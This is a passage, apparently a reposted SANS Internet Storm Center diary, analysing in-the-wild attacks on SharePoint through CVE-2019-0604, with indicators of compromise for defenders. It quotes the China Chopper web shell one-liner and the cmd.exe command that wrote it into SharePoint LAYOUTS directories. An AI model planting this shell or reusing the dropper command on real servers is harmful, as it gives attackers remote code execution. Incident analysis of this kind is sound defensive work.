CVE-2019-0604 Attack, (Mon, May 20th)

by natein Security Bulletinson Posted on

Over the past week, I started seeing attacks on Sharepoint servers using vulnerability CVE-2019-0604.  The Zero Day Initiative has a great write up(1) on the exploit of the vulnerability. 

Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a post to the Picker.aspx. This appears to be the most common entry point for this attack exploiting CVE-2019-0604. 

Initial Log 
        2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx – 443 – 121.147.96.8 python-requests/2.18.4 200 0 0 670

In the case of this attacker, they dropper a China Chopper payload on the server. China Chopper has been around for a long time. Crowdstrike did a great writeup(2) in 2015.  The payload for this is just a one-liner that was echoed into the files via command line. 

       <%eval(Request.Item["t"],"unsafe");

The anomaly that endpoint detected was a cmd shell spawning by w3wp.exe process. 

      Parent Process: w3wp.exe
      Process Name: cmd.exe

        “C:WindowsSystem32cmd.exe” /c echo ^^ > “%CommonProgramFiles%Microsoft SharedWeb Server             Extensions14TEMPLATELAYOUTSt.aspx” & echo ^^ > 
       “%CommonProgramFiles%Microsoft SharedWeb Server Extensions15TEMPLATELAYOUTSt.aspx” & echo ^^ > 
        “%CommonProgramFiles%Microsoft SharedWeb Server Extensions16TEMPLATELAYOUTSt.aspx”

While the attack appears to be an automated drive-by, the attackers did not come back and do any additional modifications to the server.

IOC’s 

Attackers IPS:
121[.]147[.]96[.]8    
211[.]222[.]223[.]14 
119[.]65[.]36[.]2 

User agent string:python-requests/2.18.4

Chopper Files created:
“%CommonProgramFiles%Microsoft SharedWeb Server Extensions16TEMPLATELAYOUTSt.aspx”
“%CommonProgramFiles%Microsoft SharedWeb Server Extensions15TEMPLATELAYOUTSt.aspx”
“%CommonProgramFiles%Microsoft SharedWeb Server Extensions14TEMPLATELAYOUTSt.aspx”

(1)https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
(2)https://www.crowdstrike.com/blog/chopping-packets-decoding-china-chopper-web-shell-traffic-over-ssl/

Thanks to my team for the analysis.

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Post author

Written by